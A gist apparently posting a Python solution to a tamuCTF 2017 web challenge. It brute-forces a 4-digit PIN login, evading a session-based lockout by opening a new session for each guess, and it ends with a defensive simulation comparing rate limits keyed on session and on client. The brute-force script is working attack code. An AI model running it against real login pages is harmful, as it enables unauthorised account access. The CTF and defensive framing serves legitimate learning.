@intrd
Last active April 26, 2017 14:40
Solution for tamuCTF 2017 - web100-super_secure_pin
```python
## Nozzlr template : HTTP POST bruteforcer (Solution for tamuCTF 2017 - web100-super_secure_pin)
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
# generate pins wordlist using crunch: crunch 4 4 0123456789 -o pins.txt
# then.. run this template on nozzlr: nozzlr http_bruteforce.py pins.txt 20
import requests


def nozz_module(payload, self=False, founds=False):
    # Join all payload columns for display; this template only uses payload[0] (the PIN).
    payloads = ':'.join(str(v) for v in payload.values())

    # A new session per call: fetch the login page first to obtain a fresh cookie.
    s = requests.session()
    headers = {
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
        'Referer': 'http://pin.ctf.tamu.edu/',
    }
    result = s.get('http://pin.ctf.tamu.edu/login', headers=headers, verify=False)
    cookies = s.cookies
    # print(result)

    headers = {
        'Origin': 'http://pin.ctf.tamu.edu',
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Referer': 'http://pin.ctf.tamu.edu/login'
    }
    postdata = {'pin': payload[0]}

    # Result dict returned to nozzlr: "code" drives the engine, "result" carries error text.
    out = {}
    out["code"] = ""
    out["result"] = ""
    code = "null"
    try:
        r = s.post('http://pin.ctf.tamu.edu/login', headers=headers, data=postdata, cookies=cookies, verify=False)
        print(r.text)
    except requests.exceptions.RequestException as e:
        # print(" ")
        out["result"] = str(e).strip()
        out["code"] = "error"
        return out

    # The challenge page answers a bad PIN with "WRONG:"; anything else is treated as a hit.
    # r.text (decoded body) keeps the substring check valid on Python 2 and 3.
    if "WRONG:" in r.text:
        out["code"] = "NEXT"
    else:
        print(payloads)
        out["code"] = "found: \"" + payloads + "\""
    return out
```
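The template above opens a new `requests.session()` for every guess, so a failure counter stored in the session cookie never accumulates. The following added example (not part of the gist or of nozzlr) models the server side of a 4-digit PIN check and compares a limiter keyed on the session with one keyed on the client address. The names `AttemptLimiter` and `simulate`, the limit of 5 failures, the PIN `7316` and the address `203.0.113.7` are all constructed for illustration.

```python
import hmac
import itertools

MAX_FAILURES = 5  # assumed policy: failed attempts allowed per key before lockout


class AttemptLimiter:
    """Counts failed PIN attempts per key and refuses the key once at the limit."""

    def __init__(self, max_failures=MAX_FAILURES):
        self.max_failures = max_failures
        self.failures = {}

    def allowed(self, key):
        return self.failures.get(key, 0) < self.max_failures

    def record_failure(self, key):
        self.failures[key] = self.failures.get(key, 0) + 1


def simulate(key_by, secret_pin="7316", client_ip="203.0.113.7"):
    """Replay a 0000-9999 sweep in which every request carries a new session id.

    key_by selects what the limiter counts on: "session" or "client".
    Returns (pin_found, guesses_the_server_actually_checked).
    """
    limiter = AttemptLimiter()
    session_ids = itertools.count(1)
    checked = 0
    for n in range(10000):
        guess = "%04d" % n
        session = "sess-%d" % next(session_ids)  # fresh cookie on each request
        key = session if key_by == "session" else client_ip
        if not limiter.allowed(key):
            # Locked out: this and every later request from the key is refused.
            return (False, checked)
        checked += 1
        # Constant-time comparison so the check itself leaks nothing about the PIN.
        if hmac.compare_digest(guess, secret_pin):
            return (True, checked)
        limiter.record_failure(key)
    return (False, checked)


if __name__ == "__main__":
    print("keyed on session:", simulate("session"))
    print("keyed on client: ", simulate("client"))
```

Keyed on the session, the counter never passes zero and the whole keyspace stays reachable; keyed on the client, checking stops after five failures.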